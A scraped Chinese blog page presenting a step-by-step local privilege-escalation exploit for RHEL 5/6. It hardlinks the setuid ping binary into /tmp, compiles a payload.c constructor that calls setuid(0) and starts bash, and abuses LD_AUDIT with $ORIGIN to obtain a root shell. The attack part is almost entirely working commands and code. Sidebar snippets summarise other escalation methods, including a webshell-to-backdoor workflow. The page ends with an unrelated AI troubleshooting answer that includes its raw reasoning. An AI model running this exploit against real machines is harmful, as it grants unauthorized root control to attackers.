RHEL6普通用户提权到root

最新推荐文章于 2022-09-24 20:09:16 发布

与尔同销万古愁

最新推荐文章于 2022-09-24 20:09:16 发布

阅读量1.3k

点赞数

分类专栏： Linux 文章标签： linux 提权

本文链接：https://blog.youkuaiyun.com/dsc1245/article/details/86701899

版权

Linux 专栏收录该内容

24 篇文章

订阅专栏

本文介绍在RHEL 5/6环境下，通过特定步骤使普通用户如oracle用户获得root权限的过程。包括创建临时目录，设置软链接，利用gcc编译特定C代码，最终通过修改LD_AUDIT环境变量实现权限提升。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

需要首先有个普通用户的shell

实验环境：RHEL6.8

应该只针对RHEL 5/6，别的版本没试

如下都是在普通用户下执行的，例如oracle用户

mkdir /tmp/exploit

ln /bin/ping /tmp/exploit/target

exec 3< /tmp/exploit/target

rm -rf /tmp/exploit

vim /tmp/payload.c 编辑文件，写入：

void __attribute__((constructor)) init()

{

         setuid(0);

         system("/bin/bash");

}

gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

使用gcc编译

使用当前的普通用户执行如下，会报错，然后你就会发现shell变成了root

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

注意最后需要在命令行中手动去执行LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3,否则不会进入root#

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与尔同销万古愁

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

119.网络安全渗透测试—[权限提升篇17]—[CentOS5.5 GNU C library 动态链接区 $ORIGIN 溢出提权]

qwsn

07-08

2059

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限[root@localhost ~]# [root@localhost ~]# [root@localhost ~]# [demo1@localhost tmp]$ #创建目录 [demo1@localhost tmp]$ #创建target文件硬链接 [demo1@localhost tmp]$ #把target文件加载到内存中 [de

RHCE-ansible（一）--- 安装ansible、主机清单、sudo提权、特权升级

weixin_58299245的博客

09-12

948

ansible环境配置、安装ansible、主机清单、ansible命令使用普通用户免密ssh登录其它主机、sudo提权、特权升级

参与评论您还未登录，请先登录后发表或查看评论

Centos5-6提权

08-13

linux提权，通常的流程是拿到Webshell -> 传EXP/编译好的程序或者各种脚本也行 -> 反弹连接 -> 运行提权 -> 获得root -> 创建后门 -> 内网渗透如社工/sync等渗透先来从基础的EXP提权说起来吧

RHEL5-6普通用户提权

weixin_33805557的博客

04-24

305

[root@ns~]#whoami##我是谁 root[root@ns~]#useraddputong [root@ns~]#su-putong [putong@ns~]$whoami putong[putong@ns~]$ll-d/tmp/ drwxrwxrwt.3rootroot409612月203:11/tmp/ [...

RHEL5/6 系统提权

love_3556的博客

09-02

1908

shared -o /tmp/exploit payload.c

redhat赋予普通用户root权限

10-04

779

方法一：修改 /etc/sudoers 文件，找到下面一行，把前面的注释（#）去掉 ## Allows people in group wheel to run all commands%wheel ALL=(ALL) ALL 然后修改用户，使其属于root组（wheel），命令如下： usermod -g root tommy 或者直接...

CentOS 6 命令（六）——alias别名命令、sudo提权、parted分区工具

我们好像在哪见过

03-23

632

ll #是ls -l的别名命令。列出当前目录内容 ls #是ls -l --color=auto的别名命令，每次列出文件的时候会有颜色提示。 alias #列出系统中所有的别名命令 alias grep=’grep --color’ #建立别名，即自定义别名。以后用grep命令会自动调用别名 cd #返回家目录 vim ~/.bashrc #记录当前用户登录bash时运行的脚本，只对...

polkit提权漏洞polkit-0.96-11.el6_10.2.x86_64.rpm

03-02

2. **提权漏洞**：提权漏洞通常指程序中的安全缺陷，允许攻击者提升其在系统中的权限，从普通用户变为管理员。这种漏洞对系统安全构成严重威胁，可能导致数据泄露、系统被控制等后果。 3. **CentOS 6**：CentOS是一...

系统提权之：Unix 提权

f_carey的博客

08-28

1057

郑重声明：本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。系统提权之：Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..

Linux学习笔记RHEL 7（五）--用户身份与文件权限、存储结构与磁盘划分（偏理论）

笑桐笔记的博客

03-30

2975

一、用户身份与能力Linux用户有三类：1.管理员 root 2.系统用户 3.普通用户在Linux系统中，UID就相当于我们的身份证号码一样具有唯一性，因此可通过用户的UID值来判断用户身份。在RHEL 7系统中，用户身份有下面这些。管理员UID为0：系统的管理员用户。系统用户UID为1～999： Linux系统为了避免因某个服务程序出现漏洞而被黑客提权至整台服务器，默认服务程序会有独立的系统...

Linux下RHEL 5-6和CentOS 5-6漏洞提权

马赛克的博客

01-06

3305

来源：https://www.jianshu.com/p/595b4ac76467 作者：星期四晚八点 ———————————————————————————————————————————————————— 一：前言提权就是让普通用户用户超级用户的权限。本次试验漏洞适用于RHEL 5-6和CentOS 5-6系列所有版本主要利用/tmp/目录和/bin/ping命令进行的权限漏洞...

Centos6普通用户获取最高权限方法

weixin_43419816的博客

09-24

3090

Centos6普通用户获取sudo权限

Redhat为标准用户添加root权限

43211018的博客

02-11

3548

为Linux安装时默认的标准用户或者后期自己添加的一般用户设置root权限

如何让普通用户获取root用户的权限

weixin_43226231的博客

08-01

358

sudo 是Linux系统管理指令，是允许系统管理员让普通用户执行一些或者全部的 root命令的一个工具，如 halt，reboot，su 等等。这样不仅减少了 root 用户的登录和管理时间，同样也提高了安全性。sudo不是对shell的一个代替，它是面向每个命令的。 sudo 的特点限制用户执行指定的命令记录用户执行的每一条命令配置文件（/etc/sudoers）提供...

redhat下利用sudo命令获得root权限的解决办法

shiyongraow的博客

09-22

6361

用sudo-l 命令查看用户是否有su权限，如图，shiyong用户没有。我们需要切换root，进入 /etc目录下寻找sudoers文件。修改它具体修改如下：再退出root，进入shiyong查看此时权限。成功！！！这样shiyong就拥有sudo权限。

Redhat利用漏洞提权

weixin_33946020的博客

02-12

1075

漏洞试用系统：redhat5—6通用一.利用/tmp拥有777的权限在/tmp下创建一个exploit目录ln /bin/ping（ping命令的权限很特殊是S，可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限，这里是root）ln /bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targe...

linux中赋予普通用户root权限的三种方式

最新发布

04-03

<think>好的，我现在需要帮助用户解决CRT链接虚拟机找不到命令的问题。首先，用户提到的CRT应该是指SecureCRT，这是一个终端仿真软件，常用于连接远程服务器或虚拟机。用户遇到的问题是在连接后输入命令时提示找不到命令，也就是“command not found”。我需要一步步分析可能的原因，并提供解决方案。首先，我应该考虑最常见的原因。第一个可能性是命令确实不存在于虚拟机中。比如用户输入的命令没有安装，或者路径不对。例如，某些命令可能需要root权限，或者用户的环境变量配置有问题。接下来，我需要分步骤思考可能的问题点： 1. **命令拼写错误**：用户可能输入了错误的命令名称，比如将ifconfig写成ipconfig，或者大小写错误。需要提醒用户检查拼写是否正确。 2. **命令未安装**：例如，在最小化安装的Linux系统中，可能没有预装net-tools包，导致ifconfig命令不可用。这时候需要安装相应的软件包。 3. **环境变量问题**：用户的环境变量PATH可能没有包含命令所在的目录。比如，某些自定义安装的软件可能不在标准路径中，导致系统找不到。 4. **权限问题**：用户可能没有执行该命令的权限，需要sudo或者切换到root用户。但通常权限问题会提示“Permission denied”而不是“command not found”，但也不排除某些情况。 5. **Shell配置问题**：用户的shell配置文件（如.bashrc、.bash_profile）可能被修改，导致PATH变量异常。或者用户可能使用了不同的shell，比如zsh，而配置未正确加载。 6. **虚拟机系统问题**：虚拟机的系统可能存在问题，比如文件系统损坏导致命令无法访问，或者动态链接库缺失。 7. **SecureCRT配置问题**：虽然较少见，但SecureCRT的终端设置可能导致某些命令无法正确识别，比如字符编码或终端类型设置错误。接下来，我应该建议用户按照以下步骤排查： - **步骤1：检查命令拼写**：确认输入的命令是否正确，比如检查是否存在拼写错误，或者尝试输入命令的绝对路径，如/bin/ls，看是否能执行。 - **步骤2：确认命令是否存在**：使用which或whereis命令查找命令的位置，例如`which ifconfig`或`whereis ifconfig`。如果找不到，说明命令未安装。 - **步骤3：安装缺失的命令**：如果命令未安装，根据不同的Linux发行版使用包管理器安装。例如，在CentOS/RHEL中使用yum install net-tools，在Debian/Ubuntu中使用apt install net-tools。 - **步骤4：检查环境变量PATH**：使用`echo $PATH`查看PATH变量是否包含命令所在目录。如果缺失，可以临时添加或修改配置文件永久添加。 - **步骤5：检查权限和用户**：确认当前用户是否有权限执行该命令，或者尝试使用sudo执行。 - **步骤6：检查Shell配置**：查看用户的.bashrc或.bash_profile是否有异常设置，或者尝试切换shell测试。 - **步骤7：系统完整性检查**：如果以上步骤都无效，可能需要检查系统文件是否完整，或者考虑重新安装相关软件包。另外，还需要考虑虚拟机本身的状态，比如是否正常启动，网络连接是否正常。如果虚拟机处于恢复模式或单用户模式，某些命令可能不可用。最后，需要提醒用户根据具体情况进行排查，并给出具体的命令示例，以便用户操作。同时，注意不同Linux发行版的差异，比如包管理器的不同，安装命令的不同。</think>当使用SecureCRT连接虚拟机时出现“找不到命令”（command not found）的问题，通常由以下原因导致。请按以下步骤排查： --- ### 一、常见原因及解决方案 #### 1. **命令未安装** - **现象**：输入基础命令（如 `ifconfig`、`netstat`）时报错。 - **原因**：虚拟机系统可能为最小化安装，未包含某些工具包。 - **解决**： - 安装对应工具包： ```bash # CentOS/RHEL sudo yum install net-tools # 安装ifconfig sudo yum install nc # 安装netcat # Debian/Ubuntu sudo apt install net-tools sudo apt install netcat ``` --- #### 2. **环境变量（PATH）配置错误** - **现象**：自定义安装的软件（如Java、Python）命令不可用。 - **原因**：命令路径未添加到 `PATH` 变量中。 - **解决**： 1. 临时修复（仅当前会话有效）： ```bash export PATH=$PATH:/自定义路径 # 例如：/usr/local/java/bin ``` 2. 永久修复：编辑 `~/.bashrc` 或 `~/.bash_profile`，添加： ```bash export PATH=$PATH:/自定义路径 ``` 保存后执行： ```bash source ~/.bashrc ``` --- #### 3. **命令拼写错误** - **现象**：输入命令时大小写错误（如 `Ipconfig` 代替 `ifconfig`）。 - **解决**： - 检查命令拼写。 - 使用 `Tab` 键自动补全。 --- #### 4. **权限问题** - **现象**：普通用户无法执行 `/sbin` 或 `/usr/sbin` 下的命令（如 `fdisk`）。 - **解决**： - 使用 `sudo` 提权： ```bash sudo fdisk -l ``` - 将用户添加到 `sudoers` 列表（需root权限）。 --- #### 5. **虚拟机系统损坏** - **现象**：所有命令均报错，或基础命令（如 `ls`、`cd`）不可用。 - **原因**：系统文件损坏或未挂载根目录。 - **解决**： - 重启虚拟机。 - 进入救援模式修复文件系统。 --- ### 二、高级排查方法 1. **检查命令是否存在**： ```bash which <命令名> # 查找命令路径（例如：which ifconfig） whereis <命令名> # 搜索命令位置 ``` 2. **验证文件系统**： ```bash echo $PATH # 查看环境变量 ls -l /usr/bin/ls # 检查命令文件权限 ``` 3. **更新软件源**： ```bash # CentOS/RHEL sudo yum update # Debian/Ubuntu sudo apt update ``` --- ### 三、SecureCRT配置建议 1. **终端类型匹配**： - 检查SecureCRT的终端仿真设置是否为 `Linux` 或 `xterm`。 - 路径：`Options → Session Options → Terminal → Emulation`。 2. **字符编码**： - 确保编码为 `UTF-8`（尤其针对中文路径）。 - 路径：`Options → Session Options → Terminal → Appearance → Character Encoding`. --- ### 四、总结步骤 1. 确认命令拼写正确。 2. 通过 `which` 检查命令是否存在。 3. 安装缺失的软件包。 4. 检查 `PATH` 环境变量。 5. 使用 `sudo` 提权执行。 6. 验证系统完整性。若问题仍未解决，请提供具体命令和虚拟机系统版本（如CentOS 7、Ubuntu 22.04），以便进一步分析。